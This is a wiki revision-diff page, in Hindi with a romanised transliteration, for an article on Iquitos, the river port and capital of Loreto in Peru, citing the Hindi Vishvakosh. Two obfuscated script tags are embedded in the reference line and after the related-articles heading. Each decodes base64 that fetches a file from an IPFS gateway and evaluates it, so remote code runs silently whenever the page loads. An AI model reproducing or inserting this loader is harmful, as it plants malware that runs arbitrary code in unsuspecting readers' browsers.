Difference between revisions of "इकीटोस नगर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (यशी चौधरी ने इकीटोस पर पुनर्निर्देश छोड़े बिना उसे इकीटोस नगर पर स्थानांतरित किया)
Line 1: Line 1:
 
{{बहुविकल्प|बहुविकल्पी शब्द=इकीटोस|लेख का नाम=इकीटोस (बहुविकल्पी)}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=इकीटोस|लेख का नाम=इकीटोस (बहुविकल्पी)}}
'''पेरू''' राज्य में मारानोन नदी के बाएँ तट पर लोरेटो प्रदेश में निवास करनेवाली दक्षिणी अमरीका की एक आदिम जाति है। यह प्रदेश 'रीओ नापा' के मुहाने से 75 मील उत्तर में हैं। ईसाई धर्मप्रचारकों के अथक प्रयत्न करने पर भी ये असभ्य ही रह गए हैं। ये शिलाओं पर अंकित पशु पक्षियों के चित्रों को पूजते हैं। ये कुछ व्यापार भी करते हैं और व्यापार में आयात की मुख्य वस्तुएँ रबर से बदली जाती हैं। 20वीं सदी के प्रारंभ में इनकी कुल संख्या 12,000 थी।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=506 |url=}}</ref>
+
इकीतोस पेरू राज्य में ऊपरी अमेज़न के बाएँ तट पर स्थित एक नगर तथा नदीबंदरगाह है। यह लोरेटो प्रदेश की राजधानी है। इकीटोस समुद्र की सतह से प्राय:400 फुट की ऊँचाई पर स्थित है। यहाँ की जलवायु गरम तथा आर्द्र है। नगर सन्‌ 1863 ई. में बसाया गया था। यहाँ के घर प्राय: फूस तथा खपरैलों के छाए हुए हैं। नगर की मुख्य व्यापारिक वस्तु रबर है। निर्यात के अन्य सामान तंबाकू, रुई, मोम, कछुए का तेल, सोना तथा पानाम हैट है। <ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=506 |url=}}</ref>
  
  
Line 8: Line 8:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{विदेशी जातियाँ}}
+
{{विदेशी स्थान}}
[[Category:विदेशी जातियाँ]][[Category:अमेरिका]]
+
[[Category:विदेशी स्थान]][[Category:विदेशी नगर]][[Category:भूगोल कोश]][[Category:हिन्दी विश्वकोश]]
[[Category:हिन्दी विश्वकोश]]
 
 
__INDEX__
 
__INDEX__

Revision as of 10:53, 27 June 2018

chitr:Disamb2.jpg ikitos ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- ikitos (bahuvikalpi)

ikitos peroo rajy mean oopari amezan ke baean tat par sthit ek nagar tatha nadibandaragah hai. yah loreto pradesh ki rajadhani hai. ikitos samudr ki satah se pray:400 phut ki ooanchaee par sthit hai. yahaan ki jalavayu garam tatha ardr hai. nagar sanh‌ 1863 ee. mean basaya gaya tha. yahaan ke ghar pray: phoos tatha khaparailoan ke chhae hue haian. nagar ki mukhy vyaparik vastu rabar hai. niryat ke any saman tanbakoo, ruee, mom, kachhue ka tel, sona tatha panam hait hai. [1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 506 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>